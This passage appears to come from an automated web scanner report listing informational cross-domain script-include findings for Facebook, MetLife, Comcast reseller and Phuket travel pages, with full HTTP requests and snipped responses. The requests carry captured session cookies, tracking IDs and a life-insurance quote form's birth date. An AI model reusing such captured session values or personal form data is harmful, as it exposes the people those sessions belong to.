<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/uBSAkAK-vQA.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/IIeFDzJo603.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/ccPAy08Ly48.js"></script>
...[SNIP]...
19.42. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.177.32
X-Cnection: close
Date: Fri, 24 Jun 2011 13:27:59 GMT
Content-Length: 9128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/IIeFDzJo603.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/6S8W9-zcvGH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js"></script>
...[SNIP]...
19.43. http://www.metlife.com/about/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /about/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/index.html?WT.ac=GN_about HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/employee-benefits/index.html?WT.ac=GN_individual_employee-benefits
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; MetlifeSU=0; op314iqtvsnotermiqtgum=a06t0gj0t0276om0rf3g72d3b; op314iqtvsnotermiqtliid=a06t0gj0t0276om0rf3g72d3b; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935132674:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.8.9.1308935113663

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:37 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:32 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 44755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<!-- OPTIMOST COUNTER CODE V2.5 - Copyright 2002-2009 Interwoven, Inc. -->
<script language="javascript" type="text/javascript" src="https://by.essl.optimost.com/es/314/c/25/u/OptimostRepContactCounter.js">&nbsp;</script>
...[SNIP]...
19.44. http://www.metlife.com/individual/employee-benefits/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /individual/employee-benefits/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /individual/employee-benefits/index.html?WT.ac=GN_individual_employee-benefits HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/insurance/disability-insurance/index.html?WT.ac=GN_individual_insurance_disability-insurance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; MetlifeSU=0; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935130100:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.7.9.1308935113663

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:33 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:29 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 42736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<!-- OPTIMOST COUNTER CODE V2.5 - Copyright 2002-2009 Interwoven, Inc. -->
<script language="javascript" type="text/javascript" src="https://by.essl.optimost.com/es/314/c/25/u/OptimostRepContactCounter.js">&nbsp;</script>
...[SNIP]...
19.45. http://www.metlife.com/individual/insurance/disability-insurance/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /individual/insurance/disability-insurance/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /individual/insurance/disability-insurance/index.html?WT.ac=GN_individual_insurance_disability-insurance HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html?hp-premium=MjI1Ljcy&otherParam=QUx8MzAwMDAwfDIwfFllc3xFfE18My00LTE5NjA=&pageFrom=MLLP_term-life-quote-tool
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MetlifeSU=0; op314iqtcreativetermfieldgum=a06c0gd0rg276oi0su0tqb515; op314iqtcreativetermfieldliid=a06c0gd0rg276oi0su0tqb515; WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935117304:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.6.9.1308935113663

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:32 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:28 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 111286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<!-- OPTIMOST COUNTER CODE V2.5 - Copyright 2002-2009 Interwoven, Inc. -->
<script language="javascript" type="text/javascript" src="https://by.essl.optimost.com/es/314/c/25/u/OptimostRepContactCounter.js">&nbsp;</script>
...[SNIP]...
19.46. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metlife.com
Path:   /individual/insurance/life-insurance/hp-life-insurance-quote.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /individual/insurance/life-insurance/hp-life-insurance-quote.html?hp-premium=MjI1Ljcy&otherParam=QUx8MzAwMDAwfDIwfFllc3xFfE18My00LTE5NjA=&pageFrom=MLLP_term-life-quote-tool HTTP/1.1
Host: www.metlife.com
Proxy-Connection: keep-alive
Referer: http://www.metlife.com/
Content-Length: 246
Cache-Control: max-age=0
Origin: http://www.metlife.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=MQPOMIS172.24.35.24CKMKW; JSESSIONID=0000FdCQHasM3ki7wW07duQyhD-:13j4u5d0o; MetlifeSU=0; siscweb=XUPOLRS172.24.35.19CKMQQ; __utmz=50475317.1308935069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1308935113655:ss=1308935068484; __utma=50475317.2023485494.1308935069.1308935069.1308935069.1; __utmc=50475317; __utmb=50475317.5.9.1308935113663

premium-mmquote=225.72&lstPnPParameters=state%2CDOB%2Ccoverage%2Cterm%2Ctobacco%2Chealth%2Cgender%2ClStatus&quoteFrom=HP&lStatus=Q&bWFCompleted=Y&IQType=hc&state1=AL&day=3&month=4&year=1960&coverages=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:01:16 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_d09HAyNzX1MjZ1NjYwMfc6B8JB55U5J0W7i4WRgYOZmaeQYauBgYeBLSHQ5yLX7bUeSxmA-SN8ABHA30_Tzyc1P1C3JDIwwyA9IByi3wRQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Set-Cookie: MetlifeSU=0; Expires=Mon, 23 Jun 2014 17:05:14 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 58276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<META http
...[SNIP]...
<!-- OPTIMOST COUNTER CODE V2.5 - Copyright 2002-2009 Interwoven, Inc. -->
<script language="javascript" type="text/javascript" src="https://by.essl.optimost.com/es/314/c/25/u/OptimostRepContactCounter.js">&nbsp;</script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" charset="utf-8" src="https://metlife.inq.com/chatskins/launch/inqChatLaunch313.js"> &nbsp;</script>
...[SNIP]...
19.47. http://www.onlinecomcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinecomcast.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw HTTP/1.1
Host: www.onlinecomcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: WebsiteAliasID=2720; domain=www.onlinecomcast.com; path=/
Set-Cookie: strRefer=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: strEntryURL=http://www.onlinecomcast.com/default.aspx?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: AffID=1092; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: SubID=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: Promo=G-1092; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: Referrer=; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: EntryURL=http://www.onlinecomcast.com/default.aspx?cpid=20134&gclid=CNHys63SzqkCFYRd5Qod4URmNw; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
Set-Cookie: CampaignID=20134; domain=www.onlinecomcast.com; expires=Sun, 24-Jul-2011 13:30:11 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:30:11 GMT
Content-Length: 79956


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Comcast Cabl
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/2.7.0/build/container/assets/container.css">

<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/animation/animation-min.js"></script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.7.0/build/container/container-min.js"></script>
...[SNIP]...
<!-- Begin keymetric include script -->
<SCRIPT TYPE="text/javascript" SRC="http://km5002.keymetric.net/KeyMetric.js"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div id="dvGuestFooterContainer">
<script src="http://themes.saveology.com/OnlineComcast/javascript/msoBuyFlow.js" type="text/javascript"></script>
...[SNIP]...
19.48. http://www.phuket-travel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:20 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:22:21 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 24 Jun 2011 02:16:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 254040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</a>
               <script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://static.asiawebdirect.com/portals/js/portals-scripts.jsi"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://static.asiawebdirect.com/premium/js/s_code.js"></script>
...[SNIP]...
19.49. http://www.phuket-travel.com/nightlife/fantasea.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /nightlife/fantasea.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nightlife/fantasea.htm?pid=AWDINP1356 HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.1.10.1308921743; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=FFABE808D53FBDC157E785A9F775AACA; Path=/
Last-Modified: Mon, 31 May 2010 08:42:38 GMT
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:34 GMT
Content-Length: 234815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</a>
               <script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://static.asiawebdirect.com/portals/js/portals-scripts.jsi"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://static.asiawebdirect.com/premium/js/s_code.js"></script>
...[SNIP]...
19.50. http://www.phuket-travel.com/premium-packages/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket-travel.com
Path:   /premium-packages/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /premium-packages/index.htm HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; JSESSIONID=48D389D0F243F4CD82ACA4D8422C50D0; s_cc=true; s_evar38=AWDINP1356; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.2.10.1308921743; s_sq=wotifcom-awd-global-prd%3D%2526pid%253Dphuket-travel.com%25253Atours%25253Athailand%25253Aphuket%25253Aphuket%252520tours%252520%252526%252520travel%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket-travel.com/premium-packages/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:39 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 10 Jun 2011 08:53:49 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:39 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 157436
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- #BeginTemplate "/Templates/po
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</a>
<script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript" ></script>
...[SNIP]...
19.51. http://www.phuket.com/andamanwhitebeach/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket.com
Path:   /andamanwhitebeach/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /andamanwhitebeach/?pid=AWDINP1314 HTTP/1.1
Host: www.phuket.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59015276.1308921639.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; __utma=59015276.1300501793.1308921638.1308921638.1308921638.1; __utmc=59015276; __utmb=59015276.2.10.1308921638; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
